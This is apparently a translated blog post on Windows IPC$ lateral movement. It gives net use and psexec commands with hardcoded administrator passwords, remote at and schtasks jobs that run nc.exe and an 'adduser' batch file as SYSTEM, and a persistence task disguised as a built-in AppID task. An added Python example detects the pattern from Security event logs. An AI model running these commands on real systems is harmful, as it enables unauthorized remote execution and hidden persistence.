IPC$ named pipes

Description: IPC$ (Internet Process Connection) is the shared resource behind "named pipes". It exists to support inter-process communication and to open named pipes: by supplying a trusted user name and password, the two sides establish a secure channel, exchange encrypted data over it, and thereby obtain access to the remote computer.

Four default shares:

Share name    Resource       Annotation
C$            C:             default share
D$            D:             default share
IPC$          (none)         remote IPC
ADMIN$        C:\WINDOWS     remote management

1. Create an IPC$ connection

net use \\192.168.100.3\ipc$ "password" /user:Administrator

2. Upload a file (here abc.txt from the current directory)

copy abc.txt \\192.168.1.131\c$

3. Verify that the connection is successful

net time \\192.168.1.131                                               // view the current time of the host connected over IPC$
psexec.exe /accepteula \\192.168.1.108 cmd                             // requires an existing null or authenticated session to the host
psexec.exe /accepteula \\192.168.1.108 -u administrator -p 123456 cmd  // no existing session required

4. Scheduled task execution

at scheduled task:

at \\10.10.10.21 18:51 C:\nc.exe      // (2003) scheduled task that runs the nc program

schtasks scheduled task:

schtasks /create /s 10.10.10.19 /u Administrator /p x /ru "SYSTEM" /tn adduser /sc DAILY /st 19:39 /tr c:\add.bat /F

result:
SUCCESS: The scheduled task "adduser" has successfully been created.

5. Delete the session

net use \\192.168.1.131\ipc$ /del


schtasks usage example:

schtasks /create /ru SYSTEM /sc DAILY /mo 1 /st 00:00:00 /RI 5 /DU 9999:00 /TN \Microsoft\Windows\APPID\Get-system /tr E:\1.bat /F

Parameters:
/ru SYSTEM          run the task as the specified user (SYSTEM)
/sc DAILY /mo 1     run daily, every 1 day (1-365)
/st 00:00:00        start time of the task
/RI 5               repetition interval of 5 minutes
/DU 9999:00         task duration of 9999 hours
/TN \Microsoft\Windows\APPID\Get-system   name to give this task (Get-system)
/tr E:\1.bat        program to run
/F                  force creation of the task

schtasks /create /RU SYSTEM /SC DAILY /mo 1 /ST 00:00:00 /RI 5 /DU 9999:00 /TN \Microsoft\Windows\AppID\Get-system /TR "cmd /c whoami>>d:\1.txt" /F

Parameters:
/ru SYSTEM          run the task as the specified user (SYSTEM)
/sc DAILY /mo 1     run daily, every 1 day (1-365)
/st 00:00:00        start time of the task
/RI 5               repetition interval of 5 minutes
/DU 9999:00         task duration of 9999 hours
/TN \Microsoft\Windows\AppID\Get-system   name to give this task (Get-system)
/tr "cmd /c whoami>>d:\1.txt"             command to run (remember the double quotes)
/F                  force creation of the task
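From the defender's side, the sequence above (a network logon that maps IPC$ or C$, then a schtasks task named like a built-in but with /tr pointing at a user-writable path) leaves a trace in the Security log. The following Python is an added example, not part of the original post: it correlates constructed records shaped like events 5140 (network share accessed) and 4698 (scheduled task created) on their SubjectLogonId, and its "Command" field stands in for the command element inside 4698's TaskContent XML.

```python
# Added example (not from the original post): correlate Security events for the
# IPC$ + schtasks pattern. Field names follow events 5140 and 4698; the records
# themselves are constructed test data, not a real log.
from collections import defaultdict

ADMIN_SHARES = {r"\\*\IPC$", r"\\*\ADMIN$", r"\\*\C$"}
# A task named under \Microsoft\Windows\... whose command is not under the
# Windows directory (or is unqualified, like a bare "cmd") is the tell.
SYSTEM_TASK_PREFIX = "\\microsoft\\windows\\"
SYSTEM_CMD_PREFIXES = ("c:\\windows\\", "%systemroot%\\", "%windir%\\")

def suspicious_task(task_name, command):
    """True when a system-looking task name runs a non-system command."""
    name = task_name.lower()
    cmd = command.lower().lstrip('"')
    return name.startswith(SYSTEM_TASK_PREFIX) and not cmd.startswith(SYSTEM_CMD_PREFIXES)

def correlate(events, window_s=600):
    """Flag a 4698 whose logon session touched an admin share over the network
    (5140 with IpAddress) within window_s seconds before the task was created."""
    share_access = defaultdict(list)  # SubjectLogonId -> [(ts, ip, share)]
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["EventID"] == 5140 and ev["ShareName"] in ADMIN_SHARES:
            share_access[ev["SubjectLogonId"]].append((ev["ts"], ev["IpAddress"], ev["ShareName"]))
        elif ev["EventID"] == 4698:
            hits = [h for h in share_access[ev["SubjectLogonId"]] if ev["ts"] - h[0] <= window_s]
            if hits and suspicious_task(ev["TaskName"], ev["Command"]):
                alerts.append({"logon": ev["SubjectLogonId"], "src_ip": hits[-1][1],
                               "task": ev["TaskName"], "command": ev["Command"]})
    return alerts

# Constructed sample: logon 0x3e7a1 from 10.10.10.5 maps IPC$ and C$, then creates a
# task named like a built-in that runs cmd writing to D:\; a benign update task and
# a task from a logon with no prior share access should not alert.
SAMPLE = [
    {"EventID": 5140, "ts": 100, "SubjectLogonId": "0x3e7a1", "IpAddress": "10.10.10.5", "ShareName": r"\\*\IPC$"},
    {"EventID": 5140, "ts": 103, "SubjectLogonId": "0x3e7a1", "IpAddress": "10.10.10.5", "ShareName": r"\\*\C$"},
    {"EventID": 4698, "ts": 160, "SubjectLogonId": "0x3e7a1", "TaskName": r"\Microsoft\Windows\AppID\Get-system",
     "Command": r'"cmd /c whoami>>d:\1.txt"'},
    {"EventID": 4698, "ts": 170, "SubjectLogonId": "0x3e7a1", "TaskName": r"\Microsoft\Windows\WindowsUpdate\Scheduled Start",
     "Command": r"C:\Windows\system32\usoclient.exe"},
    {"EventID": 4698, "ts": 900, "SubjectLogonId": "0x12345", "TaskName": r"\Microsoft\Windows\Foo\Bar",
     "Command": r"E:\1.bat"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE):
        print("ALERT", alert)
```

Real 4698 records carry the command inside TaskContent XML, so a production version would parse that element before calling suspicious_task.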

Reasons an IPC connection can fail:

1) Your system is not NT or a later operating system;
2) The remote host has not enabled the ipc$ default share;
3) The remote host does not have port 139 or 445 open (or they are blocked by a firewall);
4) Your command was typed incorrectly (for example, a missing space);
5) Wrong user name or password (irrelevant for a null session, of course).
You can also analyze the cause from the error number returned:
Error 5, access denied: the user you are using most likely lacks administrator rights; elevate privileges first;
Error 51, Windows cannot find the network path: a network problem;
Error 53, network path not found: wrong IP address; target not powered on; the target's lanmanserver service is not started; the target has a firewall (port filtering);
Error 67, network name not found: your lanmanworkstation service is not started; the target has removed ipc$;
Error 1219, the supplied credentials conflict with an existing set of credentials: you already have an ipc$ session with the target; delete it and reconnect.
Error 1326, unknown user name or bad password: the reason is obvious;
Error 1792, attempted to log on but the network logon service was not started: the target's NetLogon service is not started (this happens when connecting to a domain controller).
Error 2242, this user's password has expired: the target has an account policy that forces periodic password changes.

Origin www.cnblogs.com/zpchcbd/p/11784829.html